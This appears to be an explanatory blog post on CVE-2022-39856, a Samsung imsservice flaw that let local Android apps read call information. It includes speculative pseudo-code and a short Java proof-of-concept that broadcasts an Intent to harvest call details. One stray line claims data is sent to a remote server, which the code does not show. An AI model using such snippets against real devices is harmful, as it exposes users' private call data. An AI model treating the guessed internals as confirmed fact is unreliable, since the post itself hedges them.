In October 2022, Samsung patched a serious flaw — CVE-2022-39856 — that could allow local apps to grab private call data they shouldn’t see. The vulnerability stemmed from improper access control in the imsservice application, leaving sensitive call information exposed to malicious apps. This deep dive breaks down exactly how the bug works, shows sample exploit code, and gives tips to stay safe.
What is imsservice and Why Does this Matter?
imsservice is a system app on Samsung devices. It manages IMS (IP Multimedia Subsystem) functions like VoLTE, Wi-Fi Calling, and other call features. If a malicious app breaks into its secrets, it can collect:
- Incoming/outgoing call logs
Possibly call states (active, held, etc.)
Normally, only system apps should access this. With CVE-2022-39856, a *regular app* could sneak in.
Official References
- Samsung Security Bulletin October 2022
- CVE-2022-39856 on NVD
- CVE listing at MITRE
How Did the Flaw Happen?
The vulnerability comes down to improper permission checks. The imsservice exported services or broadcast receivers related to call data — letting *any* local app send Intents and get back sensitive information.
Here’s what likely happened, simplified in pseudo-code
// Inside imsservice, something like this
@Override
public void onReceive(Context context, Intent intent) {
// BAD: No check on the sender's identity!
if ("com.samsung.ims.CALL_INFO".equals(intent.getAction())) {
String callInfo = getCurrentCallInfo(); // sensitive
// return callInfo to sender
}
}
A malicious app just needs to send that Intent
Intent exploitIntent = new Intent();
exploitIntent.setAction("com.samsung.ims.CALL_INFO");
exploitIntent.setPackage("com.samsung.imsservice");
context.sendBroadcast(exploitIntent);
And, depending on the implementation, receive call info as a broadcast receiver or via a result intent.
Proof-of-Concept Exploit (Demo)
⚠ For educational awareness only! Do not use on unauthorized devices.
Suppose you’re a local user or an app running on a vulnerable Samsung device
// An example for receiving call info by registering a receiver
public class CallInfoReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
String callInfo = intent.getStringExtra("callInfo");
Log.d("EXPLOIT", "Stolen Call Info: " + callInfo);
// Now you have private call details!
}
}
// Register the receiver in your app’s manifest or at runtime
// Trigger the bug
Intent ask = new Intent("com.samsung.ims.CALL_INFO");
ask.setPackage("com.samsung.imsservice");
context.sendBroadcast(ask);
If imsservice is not properly protected, your receiver gets private call info.
It transmits the stolen data to a remote server.
Essentially, any other app on the same phone—*no root needed*—can harvest your calling history if unpatched.
Fix & Mitigation
Samsung patched this vulnerability in SMR Oct-2022 Release 1 by adding proper permission checks — now only system or privileged apps can access these APIs. The service is either not exported or restricted via signed permissions.
Additional Resources
- Samsung’s own patch notes (see SVE-2022-09934)
- Android Broadcast/Exported Components Best Practices
- NIST NVD Description for CVE-2022-39856
Conclusion
CVE-2022-39856 is a perfect reminder that system services must never trust local apps blindly. If you have a Samsung, make sure you’re up-to-date. And for all Android devs: always lock down permissions when handling sensitive data!
Timeline
Published on: 10/07/2022 15:15:00 UTC
Last modified on: 10/08/2022 12:51:00 UTC